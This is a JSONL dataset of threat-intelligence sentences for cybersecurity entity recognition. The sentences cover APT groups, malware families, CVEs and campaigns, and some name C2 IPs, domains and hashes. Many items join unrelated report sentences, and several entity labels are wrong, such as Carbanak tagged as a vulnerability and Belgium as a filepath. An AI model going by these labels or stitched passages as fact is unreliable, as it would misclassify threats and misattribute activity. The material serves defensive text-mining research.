{"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"ORGANIZATION: users": [[230, 235]]}, "info": {"id": "cyberner_stix_train_006135", "source": "cyberner_stix_train"}}
{"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers – which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab .", "spans": {"MALWARE: China Chopper": [[4, 17]], "VULNERABILITY: CVE-2015-0062": [[146, 159]], "VULNERABILITY: CVE-2015-1701": [[162, 175]], "VULNERABILITY: CVE-2016-0099": [[180, 193]], "THREAT_ACTOR: attacker": [[207, 215]], "ORGANIZATION: Kaspersky Lab": [[501, 514]]}, "info": {"id": "cyberner_stix_train_006136", "source": "cyberner_stix_train"}}
{"text": "Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout . This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 . APT33 : 192.119.15.41 mynetwork.cf . Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.[7 ] Magic Hound malware has used IRC for C2.[8][9 ] Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519 .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "MALWARE: Pegasus": [[42, 49]], "SYSTEM: iOS": [[87, 90]], "ORGANIZATION: Citizen Lab": [[107, 118]], "ORGANIZATION: Lookout": [[123, 130]], "TOOL: Fuzzbunch": [[151, 160]], "THREAT_ACTOR: Shadow Brokers": [[234, 248]], "THREAT_ACTOR: APT33": [[265, 270]], "IP_ADDRESS: 192.119.15.41": [[273, 286]], "DOMAIN: mynetwork.cf": [[287, 299]], "TOOL: Stratum protocol": [[322, 338]], "SYSTEM: cryptojacking bot": [[383, 400]], "SYSTEM: mining server.[7": [[409, 425]], "MALWARE: Magic Hound malware": [[428, 447]], "SYSTEM: IRC": [[457, 460]], "SYSTEM: C2.[8][9": [[465, 473]], "THREAT_ACTOR: Adversaries": [[476, 487]], "TOOL: NETEAGLE": [[501, 509]]}, "info": {"id": "cyberner_stix_train_006137", "source": "cyberner_stix_train"}}
{"text": "The newsletter includes a link to the attacker 's website , which has content focusing on topics related to China to draw the target 's interest . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power .", "spans": {"THREAT_ACTOR: attacker": [[38, 46]], "ORGANIZATION: Arbor Networks": [[171, 185]]}, "info": {"id": "cyberner_stix_train_006138", "source": "cyberner_stix_train"}}
{"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor . Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ACTs .", "spans": {"MALWARE: Hancitor": [[149, 157]], "ORGANIZATION: Windows Defender ATP": [[160, 180]], "MALWARE: LEAD": [[265, 269]], "MALWARE: BARIUM": [[274, 280]]}, "info": {"id": "cyberner_stix_train_006139", "source": "cyberner_stix_train"}}
{"text": "ESET researchers have investigated a distinctive backdoor used by the notorious APT group known as Turla (or Snake , or Uroburos) to siphon off sensitive communications from the authorities of at least three European countries . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[99, 104]], "THREAT_ACTOR: Snake": [[109, 114]], "THREAT_ACTOR: Uroburos)": [[120, 129]], "FILEPATH: Trump's_Attack_on_Syria_English.docx": [[278, 314]]}, "info": {"id": "cyberner_stix_train_006140", "source": "cyberner_stix_train"}}
{"text": "These intents are typically defined statically in the app ’ s AndroidManifest.xml config file ; some HenBox variants register further intents from their code at run-time . In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": {"MALWARE: HenBox": [[101, 107]], "THREAT_ACTOR: group": [[194, 199]], "TOOL: XMRig": [[224, 229]], "ORGANIZATION: FireEye": [[343, 350]], "THREAT_ACTOR: APT28": [[360, 365], [440, 445]], "ORGANIZATION: Russian government": [[479, 497]]}, "info": {"id": "cyberner_stix_train_006141", "source": "cyberner_stix_train"}}
{"text": "We believe these edits were an attempt at evading detection by modifying or removing parts of the toolset that the authors believed might be helpful in identifying and detecting it .", "spans": {}, "info": {"id": "cyberner_stix_train_006142", "source": "cyberner_stix_train"}}
{"text": "We suspect that this specific lure was copied from the news article http://www.cis.minsk.by/news.php?id=7557 .", "spans": {"URL: http://www.cis.minsk.by/news.php?id=7557": [[68, 108]]}, "info": {"id": "cyberner_stix_train_006143", "source": "cyberner_stix_train"}}
{"text": "We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": {"MALWARE: regsvr32.exe": [[70, 82]], "MALWARE: SCT file": [[145, 153]], "ORGANIZATION: intelligence services": [[223, 244]], "ORGANIZATION: military": [[247, 255]], "ORGANIZATION: utility providers": [[258, 275]], "ORGANIZATION: telecommunications": [[278, 296]], "ORGANIZATION: power": [[301, 306]], "ORGANIZATION: embassies": [[311, 320]], "ORGANIZATION: government institutions": [[327, 350]]}, "info": {"id": "cyberner_stix_train_006144", "source": "cyberner_stix_train"}}
{"text": "Figure 5 : core module mixes malicious payload with the original application While decompiling the original app , “ Agent Smith ” has the opportunity to modify the methods inside , replace some of the methods in the original application that handles advertisement with its own code and focus on methods communicating with ‘ AdMob ’ , ‘ Facebook ’ , ‘ MoPub ’ and ‘ Unity Ads ’ . The first malware we saw was the lurk downloader , which was distributed on October 26th . Dexphot ’s package often contains an obfuscated batch script . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"MALWARE: Agent Smith": [[116, 127]], "SYSTEM: AdMob": [[324, 329]], "SYSTEM: Facebook": [[336, 344]], "SYSTEM: MoPub": [[351, 356]], "SYSTEM: Unity Ads": [[365, 374]], "TOOL: lurk downloader": [[412, 427]], "MALWARE: Dexphot": [[470, 477]]}, "info": {"id": "cyberner_stix_train_006145", "source": "cyberner_stix_train"}}
{"text": "The DllMain function initializes the library and resolves all required Windows API functions .", "spans": {"SYSTEM: Windows": [[71, 78]]}, "info": {"id": "cyberner_stix_train_006146", "source": "cyberner_stix_train"}}
{"text": "The second legible file , dated April 23 , has the same letterhead and also is addressed to Yahya al-Sinwar .", "spans": {}, "info": {"id": "cyberner_stix_train_006147", "source": "cyberner_stix_train"}}
{"text": "However , this wo n't close the application , it will send it to the background , instead . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" . File office.vbs ( SHA256 : 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 ) was discovered in directory c:\\Windows\\System32\\spool\\drivers\\color . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"THREAT_ACTOR: FIN7": [[154, 158]], "TOOL: MuddyWater C2": [[215, 228]], "TOOL: non-public tool": [[236, 251]], "TOOL: DNSMessenger": [[254, 266]], "FILEPATH: office.vbs": [[276, 286]], "FILEPATH: 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2": [[298, 362]], "VULNERABILITY: CVE-2022 - 41080": [[448, 464]], "VULNERABILITY: CVE-2022 - 41040": [[539, 555]]}, "info": {"id": "cyberner_stix_train_006148", "source": "cyberner_stix_train"}}
{"text": "CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 .", "spans": {"VULNERABILITY: CVE-2017-0143": [[0, 13], [159, 172]], "MALWARE: tools—EternalRomance": [[49, 69]], "MALWARE: EternalSynergy—that": [[74, 93]], "VULNERABILITY: exploit": [[200, 207]], "FILEPATH: tools—EternalRomance": [[208, 228]], "FILEPATH: EternalSynergy—that": [[233, 252]]}, "info": {"id": "cyberner_stix_train_006149", "source": "cyberner_stix_train"}}
{"text": "The name of the folder and the malware configuration are read from a customized configuration file stored in the resource section of the setup program . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . We were able to correlate most of the disassembly to the corresponding functions from the Crypto++ github source , and it doesn’t appear that the malware authors have modified much of the original code . So far in 2023 , ransomware gangs hit the US , Germany , France , and the UK hard , with the US shouldering a hefty 43 % of all global attacks .", "spans": {"THREAT_ACTOR: threat group": [[187, 199]], "ORGANIZATION: FireEye": [[205, 212]], "THREAT_ACTOR: APT33": [[223, 228]], "ORGANIZATION: defense": [[301, 308]], "ORGANIZATION: aerospace": [[311, 320]], "ORGANIZATION: petrochemical organizations": [[325, 352]], "TOOL: Crypto++": [[445, 453]], "THREAT_ACTOR: ransomware gangs": [[576, 592]], "ORGANIZATION: US": [[601, 603], [652, 654]], "ORGANIZATION: Germany": [[606, 613]], "ORGANIZATION: France": [[616, 622]], "ORGANIZATION: the": [[629, 632]]}, "info": {"id": "cyberner_stix_train_006150", "source": "cyberner_stix_train"}}
{"text": "On Sept 20th,2016 similar Uri Terror report themed email was also sent to an email id connected with Indian embassy in Thailand .", "spans": {"TOOL: email": [[51, 56], [77, 82]], "ORGANIZATION: Indian embassy": [[101, 115]]}, "info": {"id": "cyberner_stix_train_006151", "source": "cyberner_stix_train"}}
{"text": "EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions . Compromised file samples ( Win32/HackedApp.Winnti.A and B ) mac-555549440ea0d64e96bb34428e08cc8d948b40e7", "spans": {"TOOL: Emissary": [[518, 526]], "FILEPATH: Win32/HackedApp.Winnti.A and B": [[679, 709]], "MALWARE: mac-555549440ea0d64e96bb34428e08cc8d948b40e7": [[712, 756]]}, "info": {"id": "cyberner_stix_train_006152", "source": "cyberner_stix_train"}}
{"text": "] orgacount-manager [ . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware . APT1 has registered at least 107 zones since 2004 . Monitor for changes made to firewall rules for unexpected modifications to allow / block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Iranians": [[82, 90]], "THREAT_ACTOR: APT1": [[174, 178]]}, "info": {"id": "cyberner_stix_train_006153", "source": "cyberner_stix_train"}}
{"text": "Enforce a strict lockout policy for network users and closely monitor logs for failed login activity .", "spans": {}, "info": {"id": "cyberner_stix_train_006154", "source": "cyberner_stix_train"}}
{"text": "Given the release of sensitive victim data , extortion , and destruction of systems , FireEye considers FIN10 to be one of the most disruptive threat actors observed in the region so far . Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": {"ORGANIZATION: FireEye": [[86, 93]], "THREAT_ACTOR: FIN10": [[104, 109]], "THREAT_ACTOR: GoCrack": [[236, 243]], "ORGANIZATION: additional users": [[377, 393]]}, "info": {"id": "cyberner_stix_train_006155", "source": "cyberner_stix_train"}}
{"text": "The threat actors have a demonstrated ability to move from one network provider to another , using some infrastructure for extended periods of time and other domains for only a few days .", "spans": {}, "info": {"id": "cyberner_stix_train_006156", "source": "cyberner_stix_train"}}
{"text": "During our research we also arrived at the conclusion that this Trojan evolved from an SMS spyware Trojan that was first spotted in October 2014 . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP PROT 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications .", "spans": {"THREAT_ACTOR: APT33": [[177, 182]], "MALWARE: malicious file": [[249, 263]], "MALWARE: custom binary protocol": [[337, 359]], "MALWARE: beacon": [[363, 369]], "TOOL: C2": [[404, 406]], "ORGANIZATION: communications": [[536, 550]]}, "info": {"id": "cyberner_stix_train_006157", "source": "cyberner_stix_train"}}
{"text": "The following screenshot shows the command execution functionality in action : The paramString parameter shown in the above screenshot can be any command received from C & C . Silence sent out emails to Russian banks . To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software .", "spans": {"THREAT_ACTOR: Silence": [[176, 183]], "ORGANIZATION: banks": [[211, 216]], "THREAT_ACTOR: Cobalt group": [[308, 320]], "MALWARE: Beacon": [[351, 357]], "MALWARE: Trojan": [[362, 368]]}, "info": {"id": "cyberner_stix_train_006158", "source": "cyberner_stix_train"}}
{"text": "So far , legitimate app stores appear to be this malware ’ s Achilles heel ; disabling the installation of third-party apps has been an effective prevention measure . We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations . the plugin manipulates the IDA intermediate language called microcode . PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": {"TOOL: PIEHOP": [[485, 491]], "TOOL: LIGHTWORK": [[501, 510]]}, "info": {"id": "cyberner_stix_train_006159", "source": "cyberner_stix_train"}}
{"text": "TG-3390 attempts to reenter the environment by identifying accounts that do not require two-factor authentication for remote access solutions , and then brute forcing usernames and passwords .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "cyberner_stix_train_006160", "source": "cyberner_stix_train"}}
{"text": "Upon completion , the payload continues execution in usermode with the privileges of the System process .", "spans": {}, "info": {"id": "cyberner_stix_train_006161", "source": "cyberner_stix_train"}}
{"text": "Let ’ s take a closer look at the suspicious file . These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement .", "spans": {"THREAT_ACTOR: FIN7": [[255, 259]], "TOOL: PoS": [[346, 349]]}, "info": {"id": "cyberner_stix_train_006162", "source": "cyberner_stix_train"}}
{"text": "The PowerShell version of the Trojan also has the ability to get screenshots . OSX_DOK.C first arrives via a phishing email that contains certain files labeled as either .zip or .docx files .", "spans": {"MALWARE: PowerShell": [[4, 14]], "MALWARE: OSX_DOK.C": [[79, 88]], "EMAIL: phishing email": [[109, 123]]}, "info": {"id": "cyberner_stix_train_006163", "source": "cyberner_stix_train"}}
{"text": "Project Spy routine At the end of March 2020 , we came across an app masquerading as a coronavirus update app , which we named Project Spy based on the login page of its backend server . The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system . block comparison variable is searched in each block of endsWithJcc and nonJcc . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"MALWARE: Project Spy": [[0, 11], [127, 138]], "TOOL: VNC": [[235, 238]], "TOOL: endsWithJcc": [[406, 417]], "TOOL: nonJcc": [[422, 428]], "THREAT_ACTOR: Monti": [[465, 470]], "SYSTEM: Linux platform": [[486, 500]]}, "info": {"id": "cyberner_stix_train_006164", "source": "cyberner_stix_train"}}
{"text": "Users do not see those SMS because they are processed not by the SMS app , but by the app that has initiated the transaction — e.g a free-to-play game . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims .", "spans": {"VULNERABILITY: zero day": [[235, 243]], "VULNERABILITY: CVE-2016-4171": [[244, 257]], "TOOL: emails": [[334, 340]]}, "info": {"id": "cyberner_stix_train_006165", "source": "cyberner_stix_train"}}
{"text": "On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . We performed static analysis on the sample and found it packed by Ultimate Packer for Executables ( UPX ) , an open source executable packer that can often be abused by malware .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[24, 37]], "ORGANIZATION: individual": [[72, 82]], "TOOL: Ultimate Packer": [[193, 208]], "TOOL: Executables": [[213, 224]], "MALWARE: malware": [[296, 303]]}, "info": {"id": "cyberner_stix_train_006166", "source": "cyberner_stix_train"}}
{"text": "The IOCs provided with this alert include IP S-PROT addresses determined to be part of the HIDDEN COBRA botnet infrastructure , identified as DeltaCharlie .", "spans": {"TOOL: IOCs": [[4, 8]], "TOOL: IP S-PROT addresses": [[42, 61]], "THREAT_ACTOR: HIDDEN COBRA": [[91, 103]], "TOOL: botnet": [[104, 110]], "MALWARE: DeltaCharlie": [[142, 154]]}, "info": {"id": "cyberner_stix_train_006167", "source": "cyberner_stix_train"}}
{"text": "The May 2018 adversary spotlight is on MYTHIC LEOPARD , a Pakistan-based adversary with operations likely located in Karachi . When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"THREAT_ACTOR: MYTHIC LEOPARD": [[39, 53]], "MALWARE: Word": [[159, 163]], "THREAT_ACTOR: PLATINUM": [[166, 174]], "ORGANIZATION: Microsoft": [[227, 236]], "VULNERABILITY: CVE-2015-2545": [[280, 293]], "THREAT_ACTOR: attacker": [[327, 335]]}, "info": {"id": "cyberner_stix_train_006168", "source": "cyberner_stix_train"}}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . One hour later , Bemstour was used against an educational institution in Belgium .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "FILEPATH: Bemstour": [[190, 198]], "FILEPATH: Belgium": [[246, 253]]}, "info": {"id": "cyberner_stix_train_006169", "source": "cyberner_stix_train"}}
{"text": "In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems . However , once the victim enters an account and password .", "spans": {"ORGANIZATION: U.S.-based defense": [[48, 66]], "ORGANIZATION: aerospace technologies": [[152, 174]], "ORGANIZATION: combat processes": [[177, 193]], "ORGANIZATION: naval defense systems": [[200, 221]]}, "info": {"id": "cyberner_stix_train_006170", "source": "cyberner_stix_train"}}
{"text": "While previous routines took advantage of competing miners ’ activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files .", "spans": {}, "info": {"id": "cyberner_stix_train_006171", "source": "cyberner_stix_train"}}
{"text": "The link resolves to a URL designed to appear legitimate , with a canonical domain of sicher97140 [ . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . Orangeworm is a group that has targeted organizations in the healthcare sector in the United States , Europe , and Asia since at least 2015 , likely for the purpose of corporate espionage .", "spans": {"ORGANIZATION: Talos": [[131, 136]], "THREAT_ACTOR: Orangeworm": [[191, 201]]}, "info": {"id": "cyberner_stix_train_006172", "source": "cyberner_stix_train"}}
{"text": "When the current app on the foreground matches with an app targeted by the malware , the Trojan will show the corresponding phishing overlay , making the user think it is the app that was just started . In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 . The Middle Eastern hacker group in this case is codenamed “ BlackOasis . ” Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of “ FinSpy ” malware , according to a new blog post published Monday . Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": {"ORGANIZATION: Kaspersky Lab": [[234, 247]], "THREAT_ACTOR: BlackOasis": [[386, 396]], "ORGANIZATION: Kaspersky": [[401, 410]], "TOOL: Adobe Flash Player": [[444, 462]], "VULNERABILITY: zero-day": [[463, 471]], "VULNERABILITY: CVE-2016-4117": [[488, 501]], "MALWARE: FinSpy": [[548, 554]], "THREAT_ACTOR: Adversaries": [[615, 626]]}, "info": {"id": "cyberner_stix_train_006173", "source": "cyberner_stix_train"}}
{"text": "This can also define what kind of evidences to collect . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . The next portion of first block and each flattened block is decided by a “ block comparison variable ” Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": {"VULNERABILITY: Carbanak": [[57, 65]], "MALWARE: Ransomware builders": [[305, 324]]}, "info": {"id": "cyberner_stix_train_006174", "source": "cyberner_stix_train"}}
{"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": {"MALWARE: sample": [[5, 11]], "MALWARE: Trochilus": [[31, 40]], "VULNERABILITY: exploit": [[278, 285], [468, 475]], "MALWARE: InPage software": [[290, 305]], "ORGANIZATION: Unit42": [[360, 366]], "TOOL: InPage": [[389, 395]], "VULNERABILITY: exploits": [[396, 404]], "ORGANIZATION: Kaspersky": [[500, 509]]}, "info": {"id": "cyberner_stix_train_006175", "source": "cyberner_stix_train"}}
{"text": "The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": {"MALWARE: DanBot": [[78, 84]], "ORGANIZATION: CTU": [[105, 108]], "TOOL: Microsoft Word": [[183, 197]], "TOOL: PowerShell": [[268, 278]], "TOOL: PS": [[281, 283]]}, "info": {"id": "cyberner_stix_train_006176", "source": "cyberner_stix_train"}}
{"text": "As shown , the certificate uses mail.mfa.gov.ua as a Common Name .", "spans": {"DOMAIN: mail.mfa.gov.ua": [[32, 47]]}, "info": {"id": "cyberner_stix_train_006177", "source": "cyberner_stix_train"}}
{"text": "Alternating Dridex and Locky campaigns of varying volumes appeared through May 2016 .", "spans": {"MALWARE: Dridex": [[12, 18]], "MALWARE: Locky": [[23, 28]]}, "info": {"id": "cyberner_stix_train_006178", "source": "cyberner_stix_train"}}
{"text": "The Windows and MacOS versions of X-Agent are capable of recording keystrokes , taking screenshots , and exfiltrating files from infected systems back to a command and control server .", "spans": {"SYSTEM: Windows": [[4, 11]], "SYSTEM: MacOS": [[16, 21]], "MALWARE: X-Agent": [[34, 41]]}, "info": {"id": "cyberner_stix_train_006179", "source": "cyberner_stix_train"}}
{"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HttpBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2011-3544": [[49, 62]], "TOOL: vulnerability": [[67, 80], [175, 188]], "TOOL: Java": [[88, 92]], "TOOL: Runtime Environment": [[93, 112]], "MALWARE: HttpBrowser": [[130, 141]], "TOOL: backdoor": [[142, 150]], "VULNERABILITY: CVE-2010-0738": [[157, 170]], "TOOL: JBoss": [[192, 197]]}, "info": {"id": "cyberner_stix_train_006180", "source": "cyberner_stix_train"}}
{"text": "It ’ s a complicated puzzle that can be solved by skilled reverse engineers only with good amount of time , code , automation , and creativity . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . They allow the attacker to run additional executables from a given URL . We found roughly 500 domain names that lead or have led to the “ Pig network ” between 2015 to March 2017 .", "spans": {"THREAT_ACTOR: group": [[149, 154]], "VULNERABILITY: PDF exploits": [[186, 198]], "VULNERABILITY: Adobe Flash Player exploits": [[201, 228]], "VULNERABILITY: CVE-2012-0158": [[246, 259]], "VULNERABILITY: Word exploits": [[260, 273]], "TOOL: Tran Duy Linh": [[320, 333]]}, "info": {"id": "cyberner_stix_train_006181", "source": "cyberner_stix_train"}}
{"text": "The callback gets the EPROCESS structures of the current process and the System process , and copies data from the System token into the token of the current process .", "spans": {"TOOL: EPROCESS": [[22, 30]]}, "info": {"id": "cyberner_stix_train_006182", "source": "cyberner_stix_train"}}
{"text": "We believe that the exploit for CVE- 2010-4398 was also based on a publicly available proof of concept .", "spans": {"VULNERABILITY: CVE- 2010-4398": [[32, 46]]}, "info": {"id": "cyberner_stix_train_006183", "source": "cyberner_stix_train"}}
{"text": "However , this method may not work if the threat actors react quickly to an attempt to remove the Trojan . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . The current campaign is a sharp escalation of detected activity since summer 2017 .", "spans": {"TOOL: sub-domains": [[137, 148]]}, "info": {"id": "cyberner_stix_train_006184", "source": "cyberner_stix_train"}}
{"text": "In all of the cases involving an advanced threat , the certificates were used to disguise malware as a legitimate file or application .", "spans": {}, "info": {"id": "cyberner_stix_train_006185", "source": "cyberner_stix_train"}}
{"text": "The Downeks downloader and Quasar C2 infrastructures are each self-contained and independent of each other .", "spans": {"MALWARE: Downeks": [[4, 11]], "MALWARE: Quasar": [[27, 33]], "TOOL: C2": [[34, 36]]}, "info": {"id": "cyberner_stix_train_006186", "source": "cyberner_stix_train"}}
{"text": "This contains the Mobile Country Code ( MCC ) and Mobile Network Code ( MNC ) values that the billing process will work for . Kaspersky Lab To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The installation procedure continues in the user-mode dropper . A survey conducted by security firm OneLogin found that only about half of IT decision makers were very confident that former employees were no longer able to access corporate applications .", "spans": {"ORGANIZATION: Kaspersky Lab": [[126, 139], [168, 181]], "ORGANIZATION: OneLogin": [[474, 482]], "VULNERABILITY: only about half of IT decision makers were very confident that former employees were no longer able to access corporate applications": [[494, 626]]}, "info": {"id": "cyberner_stix_train_006187", "source": "cyberner_stix_train"}}
{"text": "% d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest . FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces .", "spans": {"THREAT_ACTOR: Shun Wang": [[333, 342]], "THREAT_ACTOR: FIN6": [[623, 627]]}, "info": {"id": "cyberner_stix_train_006188", "source": "cyberner_stix_train"}}
{"text": "In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . Additionally , the actor possibly gained a foothold on other target networks—beyond the two intrusions discussed in this post – using similar strategies .", "spans": {"THREAT_ACTOR: APT10": [[43, 48]], "TOOL: mimikatz": [[100, 108]], "TOOL: PwDump": [[112, 118]], "TOOL: DLL load order hijacking": [[137, 161]]}, "info": {"id": "cyberner_stix_train_006189", "source": "cyberner_stix_train"}}
{"text": "Base85 encoding is usually used on pdf and postscript documentsThe configuration of the malware is stored in custom preferences files , using the same obfuscation scheme . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . The C2 server 199.247.6.253 is known to be used by the Rancor group . The first path ( /Library / Fonts / ArialUnicode.ttf.md5 ) stores the backdoor ’s full configuration , including its C2 servers .", "spans": {"THREAT_ACTOR: Molerats": [[192, 200]], "ORGANIZATION: governmental": [[209, 221]], "ORGANIZATION: embassies": [[262, 271]], "ORGANIZATION: aerospace": [[293, 302]], "ORGANIZATION: defence Industries": [[307, 325]], "ORGANIZATION: financial institutions": [[328, 350]], "ORGANIZATION: journalists": [[353, 364]], "ORGANIZATION: software developers": [[367, 386]], "TOOL: C2": [[393, 395]], "IP_ADDRESS: 199.247.6.253": [[403, 416]], "THREAT_ACTOR: Rancor": [[444, 450]]}, "info": {"id": "cyberner_stix_train_006190", "source": "cyberner_stix_train"}}
